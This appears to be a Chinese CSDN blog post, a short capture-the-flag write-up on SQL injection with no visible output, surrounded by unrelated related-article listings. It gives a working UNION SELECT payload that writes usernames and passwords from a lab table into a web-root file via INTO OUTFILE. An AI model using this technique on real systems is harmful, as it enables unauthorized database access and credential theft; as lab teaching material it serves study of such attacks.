sql无任何输出

最新推荐文章于 2023-02-03 15:52:45 发布
最新推荐文章于 2023-02-03 15:52:45 发布
阅读量364 收藏
点赞数
分类专栏: sql注入 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MichealCurry1/article/details/120678797
版权

查询1,不输出

可以看出过滤了0~127,所有的字符

因此考虑文件注入

select * from Table into outfile '/路径/文件名'
fields terminated by ','
enclosed by '"'
lines terminated by '\r\n'

(1)路径目录必须有读写权限777
(2)文件名必须唯一
(3)fields terminated by ','必须存在,否则打开的文件的列在同一的单元格中出现
(4)我验证的表结构为gbk的,否则出现乱码

 

写入

1' union select username,password from ctfshow_user5 where username='flag' into outfile '/var/www/html/ctf.txt' --

出现异常不管

在网站输入ctf.txt

得到结果

 

 

fippyFish
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sqlplus看不到dbms的输出结果
qq_46070108的博客
12-25 1018
在使用PL/SQL的时候,我们有时候会向sqlplus输出一些结果,但是可能会出现没有结果出现的情况 原因:环境变量serveroutput是关闭状态,默认不会打印输出 set serveroutput on 使用set serveroutput on 命令设置环境变量serveroutput为打开状态,从而使得pl/sql程序能够在sqlplus输出结果 ...
使用cmd命令行连接MySQL执行sql不显示结果
weixin_42209881的博客
04-28 561
登录上去之后,执行sql语句都查不到结果,后来查了一下,需要给sql语句结尾加上**\g;新装了一个mysql8.0.23,使用。
PL\SQL Developer正常登录后,但是查询的时候,没有数据输出
tongmashu的博客
08-23 3799
PL\SQL Developer正常登录后,但是查询的时候,没有数据输出
【dm8问题分析】sql执行长时间没有返回数据
qq_44236935的博客
09-30 1622
sql执行长时间没有返回数据
weblogic输出sql配置
03-19
WebLogic Server是一款由Oracle公司提供的企业级Java应用服务器,它为开发和部署分布式Java应用程序提供了强大...通过实践和学习这些教程,你可以更有效地利用WebLogic的SQL输出功能,提高你的应用程序管理和维护能力。
sql查询结果输出到文本
05-14
如果想要把sql查询的结果输出到一个文本中显示,可以按照此文本中的方法来做。
Laravel中如何轻松容易的输出完整的SQL语句
01-21
laravel 中自带的查询构建方法 toSql 得到的 sql 语句并未绑定条件参数,类似于这样 select * fromuserswhereid= ? ,所以写了个扩展包 laravel-dump-sql ,可以获取完整的 sql 语句。 源码 laravel-dump-sql – ...
SQLAdvisor,输入SQL输出SQL索引优化建议
02-12
主要功能:输出SQL索引优化建议 二、SQLAdvisor详细说明 SQLAdvisor快速入门教程 SQLAdvisor架构和实践 SQLAdvisor release notes SQLAdvisor开发规范 FAQ SQLAdvisor是由美团点评公司技术工程部DBA团队(北京)...
WordPress中输出当前页面SQL语句的方法
09-29
开发WordPress主题或者插件时可能需要查看当前页面执行了哪些SQL语句,看看那些语句比较慢,或者sql有多少条,一共执行了多少条sql语句等,有两种方法可以实现
sql语句正常,数据库数据只有部分字段数据可以查出,部分字段查不出
beiback的博客
06-13 1261
1.主要原因是数据库表中对应字段在设计的时候含有空格,需要删除空格 2.数据库字段与对应实体类属性不一致,导致无法匹配 3.可以在查询的时候先到数据库查询没有发现异常sql语句
SQLServer 查询消息输出不全 print输出结果不全
暮雪寒寒的随手记
03-21 5587
我使用的是Microsoft SQL Server Management Studio,在调试的时候,print结果不全 今天调试一个存储过程,由于语句太长,导致控制台无法打印完全,查阅资料,没有发现有调整设置的,于是巧取: 将其输出为xml SELECT '你的sql' FOR XML PATH('名字') 如下代码 -- 执行 SELECT @selectStr + @f...
一个sql语句,不返回任何结果
qq_34609844的博客
07-01 342
一个sql语句,不返回任何结果
console控制台有sql语句输出但log文件中不输出sql解决方式
weixin_43833851的博客
02-03 3295
console控制台有sql语句输出但log文件中不输出sql解决方式
Sql Server字符串前面加上【N】的作用!
系统运维
06-18 1039
select N'上海长宁店' 在字符串前面加上 N 代表存入数据库时以 Unicode 格式存储。 N'string' 表示string是个Unicode字符串 Unicode 字符串的格式与普通字符串相似,但它前面有一个 N 标识符(N 代表 SQL-92 标准中的国际语言 (National Language))。N 前缀必须是大写字母。例如,'Michél' 是字符串常量...
【解决sql日志无法输出问题】
weixin_37701609的博客
09-14 1817
sql日志无法输出 log日志无法输出
kettle sql文件输出
最新发布
05-16
Kettle的SQL文件输出是其中一种输出方式,它可以将Kettle的转换或作业中的SQL语句输出为一个单独的SQL文件。这个文件可以被其他工具或系统使用,比如在数据库中执行该SQL语句,或者将该SQL语句导入到其他系统中。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值